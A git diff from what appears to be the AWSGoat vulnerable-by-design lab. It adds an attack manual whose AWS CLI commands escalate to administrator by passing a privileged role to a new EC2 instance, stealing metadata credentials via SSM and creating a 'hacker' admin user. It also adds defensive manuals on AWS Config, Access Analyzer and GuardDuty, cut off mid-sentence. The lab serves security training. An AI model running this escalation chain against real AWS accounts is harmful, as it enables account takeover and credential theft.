diff --git a/README.md b/README.md index 4c19c4b6..e64e91a2 100644 --- a/README.md +++ b/README.md @@ -162,7 +162,7 @@ Litesh Ghute, Software Engineer (Cloud) Intern, INE # Solutions -The manuals are available in the [solutions](solutions/) directory +The offensive manuals are available in the [attack-manuals](attack-manuals/) directory, and the defensive manuals are available in the [defense-manuals](defense-manuals/) directory. Module 1 Exploitation Videos: diff --git a/solutions/module-1/01-Reflected XSS.md b/attack-manuals/module-1/01-Reflected XSS.md similarity index 100% rename from solutions/module-1/01-Reflected XSS.md rename to attack-manuals/module-1/01-Reflected XSS.md diff --git a/solutions/module-1/02-SQL Injection.md b/attack-manuals/module-1/02-SQL Injection.md similarity index 100% rename from solutions/module-1/02-SQL Injection.md rename to attack-manuals/module-1/02-SQL Injection.md diff --git a/solutions/module-1/03-Insecure Direct Object Reference.md b/attack-manuals/module-1/03-Insecure Direct Object Reference.md similarity index 100% rename from solutions/module-1/03-Insecure Direct Object Reference.md rename to attack-manuals/module-1/03-Insecure Direct Object Reference.md diff --git a/solutions/module-1/04-Sensitive Data Exposure.md b/attack-manuals/module-1/04-Sensitive Data Exposure.md similarity index 100% rename from solutions/module-1/04-Sensitive Data Exposure.md rename to attack-manuals/module-1/04-Sensitive Data Exposure.md diff --git a/solutions/module-1/05-Server Side Request Forgery Part 1.md b/attack-manuals/module-1/05-Server Side Request Forgery Part 1.md similarity index 100% rename from solutions/module-1/05-Server Side Request Forgery Part 1.md rename to attack-manuals/module-1/05-Server Side Request Forgery Part 1.md diff --git a/solutions/module-1/06-Server Side Request Forgery Part 2.md b/attack-manuals/module-1/06-Server Side Request Forgery Part 2.md similarity index 100% rename from solutions/module-1/06-Server Side Request Forgery Part 2.md rename to attack-manuals/module-1/06-Server Side Request Forgery Part 2.md diff --git a/solutions/module-1/07-IAM Privilege Escalation.md b/attack-manuals/module-1/07-IAM Privilege Escalation.md similarity index 100% rename from solutions/module-1/07-IAM Privilege Escalation.md rename to attack-manuals/module-1/07-IAM Privilege Escalation.md diff --git a/solutions/module-2/01-SQL Injection.md b/attack-manuals/module-2/01-SQL Injection.md similarity index 100% rename from solutions/module-2/01-SQL Injection.md rename to attack-manuals/module-2/01-SQL Injection.md diff --git a/solutions/module-2/02-File Upload and Task Metadata.md b/attack-manuals/module-2/02-File Upload and Task Metadata.md similarity index 100% rename from solutions/module-2/02-File Upload and Task Metadata.md rename to attack-manuals/module-2/02-File Upload and Task Metadata.md diff --git a/solutions/module-2/03-ECS Breakout and Instance Metadata.md b/attack-manuals/module-2/03-ECS Breakout and Instance Metadata.md similarity index 100% rename from solutions/module-2/03-ECS Breakout and Instance Metadata.md rename to attack-manuals/module-2/03-ECS Breakout and Instance Metadata.md diff --git a/attack-manuals/module-2/04-IAM Privilege Escalation.md b/attack-manuals/module-2/04-IAM Privilege Escalation.md new file mode 100644 index 00000000..3368de43 --- /dev/null +++ b/attack-manuals/module-2/04-IAM Privilege Escalation.md @@ -0,0 +1,204 @@ +# Objective + +Escalate Privileges to become an administrator on the AWS Account. + +# Solution + +* We have already obtained the ECS host instance's IAM Credentials in the previous manual. + +* Now let's try to create a user using those credentials. + +## Creating a User + +* Let's check the policies attached to our assumed **ecs-instance-role** + +```console +aws iam list-attached-role-policies --role-name ecs-instance-role +``` + +![](./images/04/01.png) + +* As we can see, this role has **IAMFullAccess**. So we should be able to create a user and grant him administrator access. Let's try to create a user named **hacker**. + +```console +aws iam create-user --user-name hacker +``` + +![](./images/04/02.png) + +* Error! we have been denied permission even though we have the **IAMFullAccess** policy. Let's get the role details + +```console +aws iam get-role --role-name ecs-instance-role +``` + +![](./images/04/03.png) + +* There is a permissions boundary associated with the role, we can try to view it. + +```console +aws iam get-policy --policy-arn arn:aws:iam::676162304320:policy/aws-goat-instance-boundary-policy +``` + +![](./images/04/04.png) + +```console +aws iam get-policy-version --policy-arn arn:aws:iam::676162304320:policy/aws-goat-instance-boundary-policy --version-id v1 +``` + +![](./images/04/05.png) + +* Here, we can observe that we have IAM List and Get access along with **iam:PassRole**, **ssm**, **ec2:RunInstance**. + +* From all the information we have, we can try to run a new instance and pass a role that has our desired permissions and create a new user using the creds obtained from the new instance. + +## Finding a role with desired permissions + +* First, we need to list roles to check for our desired permissions. + +```console +aws iam list-roles +``` + +![](./images/04/06.png) + +* We can observe that there is an **ec2Deployer-role**. Let's get the policies attached to it. + +```console +aws iam list-attached-role-policies --role-name ec2Deployer-role +``` + +![](./images/04/07.png) + +* Now, let's get the policy's version. + +```console +aws iam get-policy-version --policy-arn arn:aws:iam::676162304320:policy/ec2DeployerAdmin-policy --version-id v1 +``` + +![](./images/04/08.png) + +* Voila! we have a policy that allows us to perform all actions on all resources, now we need an instance profile with the **ec2Deployer-role** role attached to it! + +* List the instance profiles + +```console +aws iam list-instance-profiles +``` + +![](./images/04/09.png) + +* Make note of the ```InstanceProfileName``` (ec2Deployer) associated with our desired ```RoleName``` (ec2Deployer-role) + +* Now, let's try to pass this role to a new instance. + +## Running new instance + +* For running a new instance we need an **AMI, a security group, a subnet, and an instance profile**. + +* First, let's find an Amazon Linux 2 AMI. The below command lists the latest AMI. + +```console +aws ec2 describe-images --owners amazon --filters 'Name=name,Values=amzn-ami-hvm-*-x86_64-gp2' 'Name=state,Values=available' --query 'reverse(sort_by(Images,&CreationDate))[:1].{id:ImageId,date:CreationDate}' +``` + +![](./images/04/10.png) + +* Make note of the AMI ID, here we get ```ami-01a73f51321ab6899``` as our Amazon Linux 2 AMI. + +* Now, let's check for the available subnets + +```console +aws ec2 describe-subnets +``` + +![](./images/04/11.png) + +* Let's take ```subnet-04b5603ee98706543``` as the subnet id + +* Now, check for security groups + +```console +$ aws ec2 describe-security-groups +``` + +![](./images/04/12.png) + +* Let's take ```sg-001cef4a9d95ebde0``` as the sg id. + +* You'll have to make sure both the security group and the subnet are a part of the same VPC, thus having the same ```VpcId``` in their listings. + +* We have everything now to run a new instance. Let's run a new instance and pass the ```ec2Deployer-role``` to it. + +```console +aws ec2 run-instances --subnet-id subnet-04b5603ee98706543 --image-id ami-01a73f51321ab6899 --iam-instance-profile Name=ec2Deployer --instance-type t2.micro --security-group-ids "sg-001cef4a9d95ebde0" +``` + +![](./images/04/13.png) + +* Voila! we have created a new instance! make note of the ```InstanceID```. In our case, it is ```i-05815ea234a226115``` + +* Now, Let's create a user by obtaining credentials of the passed role with the help of ```ssm``` + +## Obtaining Credentials + +* Run the below command to obtain temporary access credentials for ```ec2Deployer-role``` + +```console +aws ssm send-command --document-name "AWS-RunShellScript" --parameters 'commands=["curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2Deployer-role/"]' --targets "Key=instanceids,Values=i-05815ea234a226115" --comment "aws cli 1" +``` + +![](./images/04/14.png) + +* Make note of the ```CommandId``` to check the commands execution result. + +* Now let's get the creds from the result. + +```console +aws ssm get-command-invocation --command-id "3c827d63-7a7a-4eeb-bf5f-337cc42b3479" --instance-id "i-05815ea234a226115" +``` + +![](./images/04/15.png) + +* We now have the credentials of ```ec2Deployer-role```. Let's export them and create a user. + +## Creating the user + +* First, export the credentials and with these credentials, we can use the role passed to our newly launched instance. + +```console +export AWS_ACCESS_KEY_ID= +export AWS_SECRET_ACCESS_KEY= +export AWS_SESSION_TOKEN= +aws sts get-caller-identity +``` + +![](./images/04/16.png) + +* Now, let's try to create a user. + +```console +aws iam create-user --user-name hacker +``` + +![](./images/04/17.png) + +* We'll now attach AdministratorAccess Policy, and create a login profile for our hacker user. + +```console +aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --user-name hacker +aws iam create-login-profile --user-name hacker --password hackerPassword@123 +aws iam create-access-key --user-name hacker +``` + +![](./images/04/18.png) + +* We have successfully created a user with **AdministratorAccess** on the **AWS Account!** + +# What's Happening? + +* After finding out the resources and actions we have access to, we were able to run an instance and utilize **ec2:passRole** to pass a role that has the desired permissions. + +* With the help of **ssm**, we executed a command on the new instance to obtain the temporary access credentials of the role we passed it. + +* Since that role has our desired permissions, we were able to use its credentials to create a new user on the **AWS Account** with Administrator Access and elevate our privileges. \ No newline at end of file diff --git a/solutions/module-2/images/01/01.png b/attack-manuals/module-2/images/01/01.png similarity index 100% rename from solutions/module-2/images/01/01.png rename to attack-manuals/module-2/images/01/01.png diff --git a/solutions/module-2/images/01/02.png b/attack-manuals/module-2/images/01/02.png similarity index 100% rename from solutions/module-2/images/01/02.png rename to attack-manuals/module-2/images/01/02.png diff --git a/solutions/module-2/images/01/03.png b/attack-manuals/module-2/images/01/03.png similarity index 100% rename from solutions/module-2/images/01/03.png rename to attack-manuals/module-2/images/01/03.png diff --git a/solutions/module-2/images/01/04.png b/attack-manuals/module-2/images/01/04.png similarity index 100% rename from solutions/module-2/images/01/04.png rename to attack-manuals/module-2/images/01/04.png diff --git a/solutions/module-2/images/01/05.png b/attack-manuals/module-2/images/01/05.png similarity index 100% rename from solutions/module-2/images/01/05.png rename to attack-manuals/module-2/images/01/05.png diff --git a/solutions/module-2/images/01/06.png b/attack-manuals/module-2/images/01/06.png similarity index 100% rename from solutions/module-2/images/01/06.png rename to attack-manuals/module-2/images/01/06.png diff --git a/solutions/module-2/images/01/07.png b/attack-manuals/module-2/images/01/07.png similarity index 100% rename from solutions/module-2/images/01/07.png rename to attack-manuals/module-2/images/01/07.png diff --git a/solutions/module-2/images/01/08.png b/attack-manuals/module-2/images/01/08.png similarity index 100% rename from solutions/module-2/images/01/08.png rename to attack-manuals/module-2/images/01/08.png diff --git a/solutions/module-2/images/01/09.png b/attack-manuals/module-2/images/01/09.png similarity index 100% rename from solutions/module-2/images/01/09.png rename to attack-manuals/module-2/images/01/09.png diff --git a/solutions/module-2/images/01/10.png b/attack-manuals/module-2/images/01/10.png similarity index 100% rename from solutions/module-2/images/01/10.png rename to attack-manuals/module-2/images/01/10.png diff --git a/solutions/module-2/images/01/11.png b/attack-manuals/module-2/images/01/11.png similarity index 100% rename from solutions/module-2/images/01/11.png rename to attack-manuals/module-2/images/01/11.png diff --git a/solutions/module-2/images/01/12.png b/attack-manuals/module-2/images/01/12.png similarity index 100% rename from solutions/module-2/images/01/12.png rename to attack-manuals/module-2/images/01/12.png diff --git a/solutions/module-2/images/01/13.png b/attack-manuals/module-2/images/01/13.png similarity index 100% rename from solutions/module-2/images/01/13.png rename to attack-manuals/module-2/images/01/13.png diff --git a/solutions/module-2/images/01/14.png b/attack-manuals/module-2/images/01/14.png similarity index 100% rename from solutions/module-2/images/01/14.png rename to attack-manuals/module-2/images/01/14.png diff --git a/solutions/module-2/images/01/15.png b/attack-manuals/module-2/images/01/15.png similarity index 100% rename from solutions/module-2/images/01/15.png rename to attack-manuals/module-2/images/01/15.png diff --git a/solutions/module-2/images/01/16.png b/attack-manuals/module-2/images/01/16.png similarity index 100% rename from solutions/module-2/images/01/16.png rename to attack-manuals/module-2/images/01/16.png diff --git a/solutions/module-2/images/01/17.png b/attack-manuals/module-2/images/01/17.png similarity index 100% rename from solutions/module-2/images/01/17.png rename to attack-manuals/module-2/images/01/17.png diff --git a/solutions/module-2/images/01/18.png b/attack-manuals/module-2/images/01/18.png similarity index 100% rename from solutions/module-2/images/01/18.png rename to attack-manuals/module-2/images/01/18.png diff --git a/solutions/module-2/images/02/01.png b/attack-manuals/module-2/images/02/01.png similarity index 100% rename from solutions/module-2/images/02/01.png rename to attack-manuals/module-2/images/02/01.png diff --git a/solutions/module-2/images/02/02.png b/attack-manuals/module-2/images/02/02.png similarity index 100% rename from solutions/module-2/images/02/02.png rename to attack-manuals/module-2/images/02/02.png diff --git a/solutions/module-2/images/02/03.png b/attack-manuals/module-2/images/02/03.png similarity index 100% rename from solutions/module-2/images/02/03.png rename to attack-manuals/module-2/images/02/03.png diff --git a/solutions/module-2/images/02/04.png b/attack-manuals/module-2/images/02/04.png similarity index 100% rename from solutions/module-2/images/02/04.png rename to attack-manuals/module-2/images/02/04.png diff --git a/solutions/module-2/images/02/05.png b/attack-manuals/module-2/images/02/05.png similarity index 100% rename from solutions/module-2/images/02/05.png rename to attack-manuals/module-2/images/02/05.png diff --git a/solutions/module-2/images/02/06.png b/attack-manuals/module-2/images/02/06.png similarity index 100% rename from solutions/module-2/images/02/06.png rename to attack-manuals/module-2/images/02/06.png diff --git a/solutions/module-2/images/02/07.png b/attack-manuals/module-2/images/02/07.png similarity index 100% rename from solutions/module-2/images/02/07.png rename to attack-manuals/module-2/images/02/07.png diff --git a/solutions/module-2/images/02/08.png b/attack-manuals/module-2/images/02/08.png similarity index 100% rename from solutions/module-2/images/02/08.png rename to attack-manuals/module-2/images/02/08.png diff --git a/solutions/module-2/images/02/09.png b/attack-manuals/module-2/images/02/09.png similarity index 100% rename from solutions/module-2/images/02/09.png rename to attack-manuals/module-2/images/02/09.png diff --git a/solutions/module-2/images/02/10.png b/attack-manuals/module-2/images/02/10.png similarity index 100% rename from solutions/module-2/images/02/10.png rename to attack-manuals/module-2/images/02/10.png diff --git a/solutions/module-2/images/02/11.png b/attack-manuals/module-2/images/02/11.png similarity index 100% rename from solutions/module-2/images/02/11.png rename to attack-manuals/module-2/images/02/11.png diff --git a/solutions/module-2/images/02/12.png b/attack-manuals/module-2/images/02/12.png similarity index 100% rename from solutions/module-2/images/02/12.png rename to attack-manuals/module-2/images/02/12.png diff --git a/solutions/module-2/images/02/13.png b/attack-manuals/module-2/images/02/13.png similarity index 100% rename from solutions/module-2/images/02/13.png rename to attack-manuals/module-2/images/02/13.png diff --git a/solutions/module-2/images/02/14.png b/attack-manuals/module-2/images/02/14.png similarity index 100% rename from solutions/module-2/images/02/14.png rename to attack-manuals/module-2/images/02/14.png diff --git a/solutions/module-2/images/02/15.png b/attack-manuals/module-2/images/02/15.png similarity index 100% rename from solutions/module-2/images/02/15.png rename to attack-manuals/module-2/images/02/15.png diff --git a/solutions/module-2/images/02/16.png b/attack-manuals/module-2/images/02/16.png similarity index 100% rename from solutions/module-2/images/02/16.png rename to attack-manuals/module-2/images/02/16.png diff --git a/solutions/module-2/images/03/01.png b/attack-manuals/module-2/images/03/01.png similarity index 100% rename from solutions/module-2/images/03/01.png rename to attack-manuals/module-2/images/03/01.png diff --git a/solutions/module-2/images/03/02.png b/attack-manuals/module-2/images/03/02.png similarity index 100% rename from solutions/module-2/images/03/02.png rename to attack-manuals/module-2/images/03/02.png diff --git a/solutions/module-2/images/03/03.png b/attack-manuals/module-2/images/03/03.png similarity index 100% rename from solutions/module-2/images/03/03.png rename to attack-manuals/module-2/images/03/03.png diff --git a/solutions/module-2/images/03/04.png b/attack-manuals/module-2/images/03/04.png similarity index 100% rename from solutions/module-2/images/03/04.png rename to attack-manuals/module-2/images/03/04.png diff --git a/solutions/module-2/images/03/05.png b/attack-manuals/module-2/images/03/05.png similarity index 100% rename from solutions/module-2/images/03/05.png rename to attack-manuals/module-2/images/03/05.png diff --git a/solutions/module-2/images/03/06.png b/attack-manuals/module-2/images/03/06.png similarity index 100% rename from solutions/module-2/images/03/06.png rename to attack-manuals/module-2/images/03/06.png diff --git a/solutions/module-2/images/03/07.png b/attack-manuals/module-2/images/03/07.png similarity index 100% rename from solutions/module-2/images/03/07.png rename to attack-manuals/module-2/images/03/07.png diff --git a/solutions/module-2/images/03/08.png b/attack-manuals/module-2/images/03/08.png similarity index 100% rename from solutions/module-2/images/03/08.png rename to attack-manuals/module-2/images/03/08.png diff --git a/solutions/module-2/images/03/09.png b/attack-manuals/module-2/images/03/09.png similarity index 100% rename from solutions/module-2/images/03/09.png rename to attack-manuals/module-2/images/03/09.png diff --git a/solutions/module-2/images/03/10.png b/attack-manuals/module-2/images/03/10.png similarity index 100% rename from solutions/module-2/images/03/10.png rename to attack-manuals/module-2/images/03/10.png diff --git a/solutions/module-2/images/03/11.png b/attack-manuals/module-2/images/03/11.png similarity index 100% rename from solutions/module-2/images/03/11.png rename to attack-manuals/module-2/images/03/11.png diff --git a/solutions/module-2/images/03/12.png b/attack-manuals/module-2/images/03/12.png similarity index 100% rename from solutions/module-2/images/03/12.png rename to attack-manuals/module-2/images/03/12.png diff --git a/solutions/module-2/images/03/13.png b/attack-manuals/module-2/images/03/13.png similarity index 100% rename from solutions/module-2/images/03/13.png rename to attack-manuals/module-2/images/03/13.png diff --git a/solutions/module-2/images/03/14.png b/attack-manuals/module-2/images/03/14.png similarity index 100% rename from solutions/module-2/images/03/14.png rename to attack-manuals/module-2/images/03/14.png diff --git a/solutions/module-2/images/03/15.png b/attack-manuals/module-2/images/03/15.png similarity index 100% rename from solutions/module-2/images/03/15.png rename to attack-manuals/module-2/images/03/15.png diff --git a/solutions/module-2/images/03/16.png b/attack-manuals/module-2/images/03/16.png similarity index 100% rename from solutions/module-2/images/03/16.png rename to attack-manuals/module-2/images/03/16.png diff --git a/attack-manuals/module-2/images/04/01.png b/attack-manuals/module-2/images/04/01.png new file mode 100644 index 00000000..d20237a5 Binary files /dev/null and b/attack-manuals/module-2/images/04/01.png differ diff --git a/attack-manuals/module-2/images/04/02.png b/attack-manuals/module-2/images/04/02.png new file mode 100644 index 00000000..4d90603a Binary files /dev/null and b/attack-manuals/module-2/images/04/02.png differ diff --git a/attack-manuals/module-2/images/04/03.png b/attack-manuals/module-2/images/04/03.png new file mode 100644 index 00000000..94c0244a Binary files /dev/null and b/attack-manuals/module-2/images/04/03.png differ diff --git a/attack-manuals/module-2/images/04/04.png b/attack-manuals/module-2/images/04/04.png new file mode 100644 index 00000000..bdd5ab41 Binary files /dev/null and b/attack-manuals/module-2/images/04/04.png differ diff --git a/attack-manuals/module-2/images/04/05.png b/attack-manuals/module-2/images/04/05.png new file mode 100644 index 00000000..242cccf8 Binary files /dev/null and b/attack-manuals/module-2/images/04/05.png differ diff --git a/attack-manuals/module-2/images/04/06.png b/attack-manuals/module-2/images/04/06.png new file mode 100644 index 00000000..2ba372a5 Binary files /dev/null and b/attack-manuals/module-2/images/04/06.png differ diff --git a/attack-manuals/module-2/images/04/07.png b/attack-manuals/module-2/images/04/07.png new file mode 100644 index 00000000..89ee8ece Binary files /dev/null and b/attack-manuals/module-2/images/04/07.png differ diff --git a/attack-manuals/module-2/images/04/08.png b/attack-manuals/module-2/images/04/08.png new file mode 100644 index 00000000..73bcfb4c Binary files /dev/null and b/attack-manuals/module-2/images/04/08.png differ diff --git a/attack-manuals/module-2/images/04/09.png b/attack-manuals/module-2/images/04/09.png new file mode 100644 index 00000000..57fab228 Binary files /dev/null and b/attack-manuals/module-2/images/04/09.png differ diff --git a/attack-manuals/module-2/images/04/10.png b/attack-manuals/module-2/images/04/10.png new file mode 100644 index 00000000..c359f45a Binary files /dev/null and b/attack-manuals/module-2/images/04/10.png differ diff --git a/attack-manuals/module-2/images/04/11.png b/attack-manuals/module-2/images/04/11.png new file mode 100644 index 00000000..2fbf855d Binary files /dev/null and b/attack-manuals/module-2/images/04/11.png differ diff --git a/attack-manuals/module-2/images/04/12.png b/attack-manuals/module-2/images/04/12.png new file mode 100644 index 00000000..655d0218 Binary files /dev/null and b/attack-manuals/module-2/images/04/12.png differ diff --git a/attack-manuals/module-2/images/04/13.png b/attack-manuals/module-2/images/04/13.png new file mode 100644 index 00000000..62dda7e1 Binary files /dev/null and b/attack-manuals/module-2/images/04/13.png differ diff --git a/attack-manuals/module-2/images/04/14.png b/attack-manuals/module-2/images/04/14.png new file mode 100644 index 00000000..0614c03c Binary files /dev/null and b/attack-manuals/module-2/images/04/14.png differ diff --git a/attack-manuals/module-2/images/04/15.png b/attack-manuals/module-2/images/04/15.png new file mode 100644 index 00000000..9ce28ab3 Binary files /dev/null and b/attack-manuals/module-2/images/04/15.png differ diff --git a/attack-manuals/module-2/images/04/16.png b/attack-manuals/module-2/images/04/16.png new file mode 100644 index 00000000..e42c1782 Binary files /dev/null and b/attack-manuals/module-2/images/04/16.png differ diff --git a/attack-manuals/module-2/images/04/17.png b/attack-manuals/module-2/images/04/17.png new file mode 100644 index 00000000..6bbd7a14 Binary files /dev/null and b/attack-manuals/module-2/images/04/17.png differ diff --git a/attack-manuals/module-2/images/04/18.png b/attack-manuals/module-2/images/04/18.png new file mode 100644 index 00000000..36f0bc02 Binary files /dev/null and b/attack-manuals/module-2/images/04/18.png differ diff --git a/defence-manuals/AWS Config.md b/defence-manuals/AWS Config.md new file mode 100644 index 00000000..0fe5f2e6 --- /dev/null +++ b/defence-manuals/AWS Config.md @@ -0,0 +1,135 @@ +# Objective +Detect changes in configuration using AWS Config + +# Solution + +* Log in to [AWS account](https://aws.amazon.com/) where [AWS Goat](https://github.com/ine-labs/AWSGoat) infrastructure has been deployed + +* Now, search for **Config** and head to it's page. + + ![](./images/AWS-Config/1.png) + +* Click on **Get Started** + + ![](./images/AWS-Config/2.png) + +## Creating Config Rule + +* In the next page, select the options as shown below + + ![](./images/AWS-Config/3.png) + +* Leave the rest as defualt and click on **Next**. + +* In the **Step 2** page, search for `iam-policy-no-statements-with-admin-access` under **AWS Managed Rules**. + + ![](./images/AWS-Config/4.png) + +* Select that rule and click on **Next**. + +* Leave all options as default in the next page and create the rule. + +* We have successfully created a rule which monitors for policy that has access to all services and all resources. + +* Let's check if this rule is working properly. + +## Testing Config Rule + +* Head to **IAM** > **Policies** > **Create Policy** on the console + + ![](./images/AWS-Config/5.png) + +* Now, in the **Create Policy**, select on **JSON** and paste the below policy. + + ```JSON + { + "Version": "2012-10-17", + "Statement": [ + { + "Effect":"Allow", + "Action":"*", + "Resource":"*" + } + ] + } + ``` + + ![](./images/AWS-Config/6.png) + +* Click on **Next** and name the policy as `FullAccessPolicy`. + + ![](./images/AWS-Config/7.png) + +* Now, head back to **Config** > **Rules**. + + ![](./images/AWS-Config/8.png) + +* We can see that now we have 1 Non-Compliant Resource! click on the rule to view the **Non-Compliant Resourse**. + +* Voila! it is the policy that we had just created. + + ![](./images/AWS-Config/9.png) + +* Now, delete the policy and check if the **Detective Complaince** status has changed. + + ![](./images/AWS-Config/10.png) + + ![](./images/AWS-Config/11.png) + +* The status changed, the rule is working perfectly! You can add more rules to monitor the changes in the configuration. + +# Inferences + +* AWS Config tracks and monitors changes in the configuration. + +* We can trigger the evaluations periodically or trigger them when all/specific resource changes. + +* When we created a policy with full access to all resources, AWS Config quickly evaluated the resources based on the trigger and changed the complaince status, this helps us identify if someone is trying to exploit our resources. + +* This can help us detect the attack performed in [IAM Privilege Escalation Manual](https://github.com/ine-labs/AWSGoat/blob/master/attack-manuals/module-1/07-IAM%20Privilege%20Escalation.md). where the hacker tries to create an overly permissive policy. + +# Additional Things To-Do + +* By performing above steps, we can only view the complaince status in AWS Console. We won't be able to check the Config page every now and then to view the complaince status. Therefore, we need an automatic notification system. + +* To do that, we can trigger the config to publish a message into an SNS Topic which in turn sends an email whenever the rule is non-complaint. + +* This is possible by creating a remediation to the rule in AWS Config. + +## Creating Topic + +* First, head over to **Simple Notification Sevice** Page. + + ![](./images/AWS-Config/12.png) + +* Now, create a topic names `Config-Change-Email`. + + ![](./images/AWS-Config/13.png) + +* Now, create a subscription for the topic. Select the **Protocol** as **Email** and enter the preferred email where you want to receive the notification. + + ![](./images/AWS-Config/14.png) + +## Creating Remediation + +* Head back to **Config** > **Rules** and select **Manage Remediation** under **Actions** dropdown for our rule. + + ![](./images/AWS-Config/15.png) + +* In the next page, select the options as shown below. + + ![](./images/AWS-Config/16.png) + +* Type in the Topic arn, Message and AutomationAssumeRole. + + ![](./images/AWS-Config/17.png) + +* We have successfully created a remediation. With this we will now be able to get an email notification whenever there is change in the configuration. + +# Further Readings + +* [What is AWS Config?](https://docs.aws.amazon.com/config/latest/developerguide/WhatIsConfig.html) + +* [IAM Security Best Practices](https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html) + +* [What is Amazon Macie?](https://docs.aws.amazon.com/macie/latest/user/what-is-macie.html) \ No newline at end of file diff --git a/defence-manuals/AWS IAM Access Analyzer.md b/defence-manuals/AWS IAM Access Analyzer.md new file mode 100644 index 00000000..514e6ca2 --- /dev/null +++ b/defence-manuals/AWS IAM Access Analyzer.md @@ -0,0 +1,111 @@ +# Objective + +Use AWS IAM Access Analyzer to identify resources shared with an external entity and unintended access to your resources and data, which may pose a security risk. + +# Solution + +Log in to [AWS account](https://aws.amazon.com/) where [AWS Goat](https://github.com/ine-labs/AWSGoat) infrastructure has been deployed. + +Search for "IAM" and navigate to the IAM dashboard. + +![](./images/AWS-IAM-Access-Analyzer/1.png) + +Click on "Access analyzer" from the access reports. + +![](./images/AWS-IAM-Access-Analyzer/2.png) + +Access Analyzer helps you identify the resources in your organization and accounts, such as Amazon S3 buckets or IAM roles, shared with an external entity. This lets you identify unintended access to your resources and data, which is a security risk. + +Now, Click on "Create analyzer". + +![](./images/AWS-IAM-Access-Analyzer/3.png) + +Set everything as default and click on "Create analyzer". + +Access Analyzer generates a finding for each instance of a resource shared outside of your account. The findings include details about the access and the external principal who granted it. When you create an analyzer, you choose an organization or AWS account to analyze. Any principal in the organization or account that you choose for the analyzer is considered trusted. + +![](./images/AWS-IAM-Access-Analyzer/4.png) + +Access Analyzer generates a finding for each instance of a resource-based policy that grants access to a resource within your zone of trust to a principal that is not within your zone of trust. Any sharing that is within the zone of trust is considered safe, so Access Analyzer does not generate a finding. + +Click on "Finding ID" of the resource "S3 Bucket". This will list details about the finding. + +![](./images/AWS-IAM-Access-Analyzer/5.png) + +This finding shows that the resource (S3 Bucket) is open to the public and "Read" and "List" operations can be performed on it. + +Here, Access level "List" is the unintended access to this S3 Bucket and this may lead to the sensitive data exposure. The "s3:ListBucket" permission returns a list of all buckets owned by the authenticated sender of the request and we don't want our user to have this permission. Whereas, "s3:GetObject" permission is simply used to retrieves objects from Amazon S3 bucket. And we need "s3:GetObject" permission to run our web application. + +Click on the resource ARN to navigate to the resource (Open it in a separate tab). + +![](./images/AWS-IAM-Access-Analyzer/6.png) + +Click on "Permissions" + +![](./images/AWS-IAM-Access-Analyzer/7.png) + +Here, click on "Edit" and remove the "s3:ListBucket" action. + +![](./images/AWS-IAM-Access-Analyzer/8.png) + +Remove the "s3:ListBucket". + +![](./images/AWS-IAM-Access-Analyzer/9.png) + +Now, click on the "Save changes". + +![](./images/AWS-IAM-Access-Analyzer/10.png) + +We can see the permission got removed. + +![](./images/AWS-IAM-Access-Analyzer/11.png) + +Click on "Rescan" and you will see the "Status" got changed to "Resolved". + +If the resource is no longer shared outside of your zone of trust, the status of the finding is changed to Resolved. The finding is no longer displayed in the Active findings table, and instead is displayed in the Resolved findings table. Now, the access is removed, the status changed to Resolved. + +![](./images/AWS-IAM-Access-Analyzer/12.png) + +Now, navigate back to the findings dashboard and click on the another finding ID. + +![](./images/AWS-IAM-Access-Analyzer/13.png) + +This finding is due to the bucket being open to the public, as we intended. So, let us "Archive" this finding by clicking on the "Archive" button. + +![](./images/AWS-IAM-Access-Analyzer/14.png) + +Again, navigate back to the findings dashboard and click on the next finding ID. + +![](./images/AWS-IAM-Access-Analyzer/15.png) + +Same as before, this finding is due to the bucket being open to the public, as we intended. So, let us "Archive" this finding as well by clicking on the "Archive" button. + +You can click on the resource ARN to view the resource details. + +![](./images/AWS-IAM-Access-Analyzer/16.png) + +Click on the "Archive" button to archive the finding. + +When you archive a finding, it is removed from Active findings and the status changes to Archived. + +![](./images/AWS-IAM-Access-Analyzer/17.png) + +Navigate back to the findings dashboard. Since, we resolved and archived all the findings no more findings are listed here to resolve. + +![](./images/AWS-IAM-Access-Analyzer/18.png) + +# Inferences + +* Access Analyzer identifies the resources, shared with an external entity which may pose security threat. + +* Access Analyzer generates a finding for each instance of a resource shared outside of your account. The findings include details about the access and the external principal who granted it. + +* Using the findings we can take the necessary actions. + +* This can defend us against the attack performed in [IAM Privilege Escalation](https://github.com/ine-labs/AWSGoat/blob/master/attack-manuals/module-1/07-IAM%20Privilege%20Escalation.md) when the attacker tries to list the bucket objects. + +# Further Readings + +* [What is IAM Access Analyzer](https://docs.aws.amazon.com/IAM/latest/UserGuide/what-is-access-analyzer.html) + +* [IAM Security Best Practices](https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html) \ No newline at end of file diff --git a/defence-manuals/Amazon Guarduty.md b/defence-manuals/Amazon Guarduty.md new file mode 100644 index 00000000..5774b192 --- /dev/null +++ b/defence-manuals/Amazon Guarduty.md @@ -0,0 +1,101 @@ +# Objective + +Use Amazon GuardDuty findings to analyze S3 data events from your S3 buckets and monitor them for malicious and suspicious activity. + +# Solution + +Log in to [AWS account](https://aws.amazon.com/) where [AWS Goat](https://github.com/ine-labs/AWSGoat) infrastructure has been deployed. + +Search for "GuardDuty" and navigate to the GuardDuty dashboard. + +![](./images/Amazon-Guardduty/1.png) + +Amazon GuardDuty is a threat detection service that continuously monitors your AWS Service accounts, workloads, and data stored in Amazon S3 for malicious activity and provides detailed security findings for visibility and remediation. + +Click on "Get Started". + +![](./images/Amazon-Guardduty/2.png) + +Click on "Enable GuardDuty". + +![](./images/Amazon-Guardduty/3.png) + +A GuardDuty finding denotes a potential security issue discovered in your network. When GuardDuty detects unexpected and potentially malicious activity in your AWS environment, it generates a finding. You can view and manage your GuardDuty findings via the Findings page in the GuardDuty console, as well as through AWS CLI or API operations. + +Since GuardDuty takes time to generate the findings, there may not be any findings available initially. The findings will eventually appear after some time. Keep pressing the refresh button. + +![](./images/Amazon-Guardduty/4.png) + +Once the finding appears, click on the finding to get a detailed view. This will provide the details about the affected resources. + +![](./images/Amazon-Guardduty/5.png) + +Each GuardDuty finding has an assigned severity level and value that reflects the potential risk. GuardDuty breaks down this range into High, Medium, and Low severity levels. This bucket is having "High" severity level. + +![](./images/Amazon-Guardduty/6.png) + +The finding will provide the details about the affected resource. It will also provide the action done. Here the action was to change bucket Policy and it is listed as "PutBucketPolicy". + +![](./images/Amazon-Guardduty/7.png) + +The finding also informs you that the 